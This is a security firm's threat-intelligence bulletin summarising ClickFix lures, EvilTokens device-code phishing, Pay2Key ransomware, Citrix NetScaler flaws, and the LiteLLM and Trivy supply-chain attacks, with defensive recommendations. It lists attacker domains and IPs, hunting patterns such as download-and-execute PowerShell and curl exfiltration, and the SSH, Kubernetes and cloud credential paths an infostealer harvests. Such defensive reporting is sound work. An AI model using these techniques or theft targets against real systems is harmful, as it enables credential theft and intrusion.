Threat Watch Feed
🚩 – IOCs Added
The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.
🚩 Recorded Future Details Five ClickFix Social Engineering Clusters Targeting Windows and macOS
Recorded Future’s Insikt Group published identifying five distinct ClickFix activity clusters targeting Windows and macOS systems. The clusters include lures impersonating Intuit QuickBooks, Booking.com, and Birdeye, along with dual-platform and macOS-focused variants. Insikt Group states the activity has been observed since at least May 2024 and assesses that ClickFix has evolved from a niche tactic into a standardized initial access method used across multiple threat actor ecosystems. The campaigns target a range of sectors, including accounting, travel, real estate, and legal services. ClickFix relies on social engineering to persuade users to copy, paste, or manually execute obfuscated commands in trusted tools such as the Windows Run dialog, PowerShell, or macOS Terminal. Across the clusters, Insikt Group observed a common four-stage pattern: obfuscated input, native execution through legitimate system shells or LOLBins, remote retrieval from attacker-controlled infrastructure, and immediate in-memory execution. On Windows, clusters delivered payloads including NetSupport RAT and used Startup-folder persistence. On macOS, campaigns used encoded terminal commands and infrastructure associated with MacSync. Insikt Group notes the technique’s core value is that it shifts execution to user-assisted actions, helping it evade traditional browser-based protections and some endpoint controls.
Impact: ClickFix increases initial access risk by exploiting normal user behavior and trusted native utilities rather than browser exploits or traditional malware delivery alone. This can allow threat actors to execute remote code, establish persistence, and deliver secondary payloads with limited early forensic artifacts. Because the methodology is reusable across brands, sectors, and operating systems, organizations may face recurring exposure even when individual domains or lures are blocked.
Recommendation: Disable the Windows Run dialog and Win+R shortcut through Group Policy where operationally feasible. Implement PowerShell Constrained Language Mode and use AppLocker or Windows Defender Application Control to restrict unapproved script execution and LOLBin abuse. On macOS, restrict Terminal and shell interpreter use through MDM-enforced application control policies and apply endpoint controls that limit unauthorized script execution. Hunt for suspicious command patterns involving obfuscated PowerShell, encoded shell commands, Invoke-RestMethod plus Invoke-Expression behavior, and unexpected use of tools such as xxd, nohup, zsh, or bash for staged downloads. Monitor for Startup folder persistence, shortcut modification, and remote retrieval of staging files or scripts from newly observed infrastructure. Conduct user awareness training focused on fake human-verification prompts and any workflow requiring users to paste commands into Run, PowerShell, or Terminal . Where available, use intelligence monitoring to identify brand impersonation, newly registered lookalike domains, and recurring HTML or DOM artifacts associated with ClickFix infrastructure.
🚩 Huntress Details EvilTokens Phishing-as-a-Service Abusing Railway[.]com PaaS for Microsoft 365 Device Code Attacks
Huntress reported an active Microsoft 365-focused phishing campaign leveraging Railway[.]com infrastructure, first observed on February 19, 2026, with significant acceleration beginning March 2, 2026. The activity has impacted over 340 organizations across the United States, Canada, Australia, New Zealand, and Germany. As of March 23, Huntress attributed the activity to the EvilTokens phishing-as-a-service platform, which provides tooling for credential harvesting, phishing delivery, and infrastructure management. The campaign uses OAuth device code phishing to trick users into authenticating attacker-controlled sessions via legitimate Microsoft endpoints. Victims are directed through multi-stage phishing chains, often involving trusted platforms, compromised websites, and security vendor URL rewriters to evade detection. Once a victim enters a device code, attackers obtain valid OAuth access and refresh tokens, enabling persistent access without needing credentials or bypassing MFA. Railway infrastructure is used to host token replay and authentication activity, leveraging trusted cloud IP space to avoid risk-based detection.
Impact: This campaign enables persistent unauthorized access to Microsoft 365 environments, even after password resets, due to reliance on valid OAuth tokens. Organizations face elevated risk of business email compromise, data exfiltration, and financial fraud, particularly in sectors handling sensitive communications or transactions. The scale, infrastructure reuse, and evasion techniques reduce the effectiveness of traditional email and domain-based defenses, shifting detection requirements to identity and authentication layers.
Recommendation: Hunt for successful authentications from Railway IP ranges (162.220.232.0/22 and 162.220.234.0/22) in Entra ID or SIEM logs. Revoke refresh tokens for any potentially impacted users and investigate associated sessions. Block or restrict authentication from Railway infrastructure using Conditional Access if not business-required. Disable or tightly restrict OAuth device code authentication flows to only required users. Require compliant or managed devices for access to Microsoft 365 services such as Exchange Online and SharePoint. Enable Continuous Access Evaluation (CAE) to reduce token abuse windows. Monitor for anomalous user agents, including synthetic or inconsistent device identifiers. Train users to recognize device code phishing scenarios, including prompts to enter codes into legitimate Microsoft login pages.
🚩 Pay2Key Iranian-Linked Ransomware Targets U.S. Healthcare in Latest Resurgence
Halcyon and Beazley Security reported on a February 2026 Pay2Key ransomware intrusion at a U.S. healthcare organization, assessing the activity as part of the group’s renewed operations amid heightened Iran-related geopolitical tensions. Investigators found the threat actor maintained access to a compromised admin account for several days, then used TeamViewer, credential theft tools including Mimikatz, LaZagne, and ExtPassword, and network discovery utilities to expand access and prepare for deployment. The ransomware was delivered through a staged self-extracting archive that decrypted components in memory, registered a fake Avast Antivirus instance with Windows Security Center to suppress Defender, and then systematically suspended BitLocker, shut down Hyper-V virtual machines, unmounted virtual disks, disabled recovery mechanisms, deleted backup catalogs, and cleared event logs. The observed variant was described as a significant upgrade from mid-2025 activity, with stronger evasion, execution, and anti-forensic tradecraft, and investigators notably found no evidence of data exfiltration during this intrusion.
Impact: This intrusion demonstrates that Pay2Key remains capable of quickly converting privileged access into large-scale operational impact, with a workflow designed to weaken endpoint defenses, eliminate backup and recovery paths, and accelerate encryption across both physical and virtual infrastructure. The absence of observed exfiltration suggests the group may be willing to prioritize destructive impact over conventional double-extortion pressure in some cases. Given the group’s history of targeting organizations aligned with Iranian state interests and the apparent correlation between its activity and regional conflict, Pay2Key continues to present both ransomware risk and potential strategic disruption risk.
Recommendation: Treat Pay2Key as an unpredictable, politically motivated threat that intensifies operations during periods of U.S.-Iran geopolitical tension. Organizations should hunt for the specific execution chains identified in this report, particularly the use of wsc_proxy.exe with the /wsc_name:”Avast Antivirus” argument, which indicates an active attempt to spoof the Windows Security Center. Security teams must monitor for the unauthorized deployment of the “Everything.exe” file search utility and sudden power configuration changes (powercfg.exe) that disable hibernation. Finally, defenders should alert on any PowerShell commands attempting to suspend BitLocker (Suspend-BitLocker) or stop/dismount Hyper-V virtual machines (Stop-VM, Dismount-DiskImage), as these are immediate precursors to the encryption phase.
Citrix NetScaler vulnerabilities enable unauthenticated data exposure and session mix-up risks in SAML and gateway configurations
Citrix published a security bulletin on March 23, 2026, disclosing two vulnerabilities affecting NetScaler ADC and NetScaler Gateway: CVE-2026-3055 and CVE-2026-4368. The most severe, CVE-2026-3055 (CVSS 9.3), is an out-of-bounds read vulnerability that can allow an unauthenticated remote attacker to access sensitive information from appliance memory. The issue affects customer-managed NetScaler instances configured as a SAML Identity Provider (IdP), which is commonly used for single sign-on deployments. CVE-2026-4368 (CVSS 7.7) is a race condition vulnerability that can result in user session mix-ups when the appliance is configured as a gateway or AAA virtual server. According to vendor and third-party reporting, exploitation of CVE-2026-3055 does not require authentication and targets exposed NetScaler appliances with SAML IdP functionality enabled. While no active exploitation or public proof-of-concept has been reported at the time of disclosure, similar NetScaler vulnerabilities have historically been widely exploited once technical details became available. The vulnerabilities impact multiple supported versions prior to patched releases, and Citrix has issued updates addressing both issues.
Impact: The primary risk is exposure of sensitive information from memory on internet-facing NetScaler appliances, which could include authentication material or session data, depending on deployment. In environments using SAML for authentication, this increases the risk of credential compromise and downstream access to internal systems. The session mix-up vulnerability may also affect user integrity and session isolation in gateway deployments. Given the critical role of NetScaler in identity and remote access workflows, successful exploitation could enable further intrusion activity or compromise of authentication flows.
Recommendation: Organizations should review the source material and assess exposure. Priority actions include upgrading NetScaler ADC and NetScaler Gateway to patched versions, particularly for systems configured as SAML IdPs, gateways, or AAA virtual servers. Inventory externally accessible NetScaler appliances, verify configuration settings such as SAML IdP profiles, and monitor for anomalous authentication behavior or unexpected session activity.
🚩 LiteLLM PyPI Supply Chain Attack Exfiltrates Cloud Credentials and Cryptocurrency Wallets via Compromised Maintainer Account
OX Security researchers disclosed a supply chain attack on LiteLLM Python library versions 1.82.7 and 1.82.8 on March 24, 2026 following compromise of a maintainer’s PyPI account by threat actor TeamPCP. LiteLLM is an open-source Python library providing unified interfaces to call over 100 large language models including OpenAI, Anthropic, and VertexAI using standardized input/output formats. The malicious versions contained an infostealer targeting AWS, GCP, GitHub, SSH keys, and cryptocurrency wallets including Bitcoin, Litecoin, Ethereum, and Solana. With over 3 million daily downloads, the compromise potentially affected a large number of users during the approximately 24-hour period before malicious versions were removed. The attack deployed three layers of base64-encoded payloads through a malicious .pth Python configuration file, with the final stage exfiltrating stolen credentials to command and control server models.litellm.cloud after encrypting data with hardcoded OpenSSL keys.
Impact: This supply chain compromise exposed developers and organizations to widespread credential theft through a trusted dependency. Affected systems may have had cloud access keys, infrastructure secrets, communication platform tokens, and cryptocurrency wallet data exfiltrated. Because the malicious logic executed during normal package use, organizations may not have immediate visibility into compromise, increasing the risk of unauthorized access, lateral movement, and financial loss. The malware searches and extracts SSH keys from ~/.ssh/ directories including id_rsa, id_ed25519, id_ecdsa, id_dsa, authorized_keys, known_hosts, and config files. Kubernetes credentials are harvested from /etc/kubernetes/admin.conf, controller-manager.conf, scheduler.conf, and service account tokens at /var/run/secrets/kubernetes.io/serviceaccount/ paths. Google Cloud credentials are stolen from ~/.config/gcloud/ and /root/.config/gcloud/application_default_credentials.json, while Azure credentials are extracted from /.azure directories. The infostealer reads user command history, npmrc, mongorc configurations, and database credentials for LDAP, Redis, MySQL, PostgreSQL, and Postfix installations.
Recommendation: Identify and remove LiteLLM versions 1.82.7 and 1.82.8 from all environments. Rotate all potentially exposed credentials, including cloud provider keys, SSH keys, API tokens, database credentials, and communication platform tokens. Pin dependencies to specific safe versions using exact version numbers rather than unpinned or caret-range specifications that automatically install newer releases. Review installation configurations for unpinned LiteLLM dependencies specified as “litellm” or range-based pins like “litellm^=1.82.6” that would have pulled malicious versions. Audit systems for indicators of compromise, including connections to models[.]litellm[.]cloud and checkmarx[.]zone. Review dependency management practices and pin packages to known safe versions to prevent automatic installation of malicious updates. Inspect systems for unauthorized access to sensitive files such as SSH key directories, Kubernetes configurations, and cloud credential stores. Monitor for suspicious outbound traffic and unusual access patterns involving developer tools and infrastructure resources. Implement least privilege access controls and limit credential exposure within development environments.
Microsoft Details Supply Chain Compromise of Aqua Security Trivy Vulnerability Scanner
Microsoft Defender Security Research reported that on March 19, 2026, Aqua Security’s open-source vulnerability scanner Trivy was compromised in a CI/CD-focused supply chain attack. According to Microsoft, attackers used access from a prior incident that was not fully remediated to tamper with trusted Trivy distribution channels. The activity affected the Trivy core binary, the trivy-action GitHub Action, and the setup-trivy GitHub Action. Microsoft further notes the campaign has since expanded to additional frameworks, including Checkmarx KICS and LiteLLM, though details on that broader activity remain ongoing. The attack abused mutable GitHub tags and compromised credentials with tag write access to force-push malicious commits behind trusted version references in trivy-action and setup-trivy. In parallel, attackers triggered release automation to publish a malicious Trivy binary, v0.69.4, to official distribution channels. On compromised self-hosted GitHub Actions runners, Microsoft observed malware performing process discovery, decoding a Python-based credential stealer, harvesting cloud, Kubernetes, CI/CD, infrastructure, database, and application secrets, encrypting the stolen data, and exfiltrating it to the typosquatted domain scan.aquasecurtiy[.]org. The malware then launched the legitimate Trivy scan so the workflow appeared to complete normally. Microsoft attributes the activity to TeamPCP and states maintainers removed the malicious artifacts later on March 19, ending the active propagation phase.
Impact: This compromise turned trusted security tooling into an access and credential theft mechanism inside build pipelines and developer environments. Organizations using affected Trivy components risk exposure of cloud credentials, Kubernetes secrets, CI/CD secrets, infrastructure access data, and other sensitive material present on runners or developer systems. Because the malicious tooling preserved expected scan behavior, impacted environments may not have obvious operational signs of compromise even where secret theft occurred.
Recommendation: Verify Trivy-related components and update to safe versions identified by Microsoft: Trivy binary v0.69.2 through v0.69.3, trivy-action v0.35.0, and setup-trivy v0.2.6. Review workflows for any use of tag-based GitHub Action references and replace them with verified commit SHAs. Audit CI/CD pipelines for overprivileged GITHUB_TOKEN usage and reduce token and credential permissions to the minimum required. Investigate self-hosted GitHub Actions runners for signs of process discovery, environment variable dumping, metadata service access, Kubernetes secret enumeration, curl-based exfiltration, and references to scan.aquasecurtiy[.]org, 45.148.10.212, /tmp/runner_collected_, or tpcp.tar.gz. Rotate secrets that may have been exposed in affected pipelines, including cloud credentials, Kubernetes service account material, CI/CD tokens, webhook URLs, SSH-related secrets, and database connection strings. Avoid unnecessary exposure of secrets through environment variables and retrieve secrets just in time from dedicated secret managers. Use ephemeral or clean runners and ensure credentials are not persisted across jobs. Restrict third-party action usage through policy controls and allow only approved actions by default. Use available detection content and advanced hunting queries to identify affected hosts, malicious commands, suspicious network activity, and compromised Trivy installations.
Sign up here!
To receive the TIGR Threat Watch email bulletin and critical vulnerability notifications, simply complete the form below.
Follow on Twitter
@SRA_ThreatWatch will keep you up to date with the most recent posts on your social media feed.
Subscribe to the RSS
Just copy and add this link to your RSS app and be notified immediately when new intel is posted.
How to use RSS
Following the RSS feed is easy. RSS can be added in your Outlook desktop app, and there are many free RSS readers available for your mobile device.
To follow using Outlook:
- In Outlook, right-click the RSS Feeds folder and choose Add a New RSS Feed.
- In the New RSS Feed dialog box, enter the URL of the RSS Feed: https://sra.io/category/tigr/feed
(click here for detailed instructions and additional options for Outlook)
Popular mobile RSS reader apps include:
- Feedly
- NewsBlur
- RSS Reader
- Inoreader
After installing your preferred RSS reader, you will be able to add this feed by entering the URL: https://sra.io/category/tigr/feed
Threat Bulletin Archive
About TIGR Threat Watch
Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.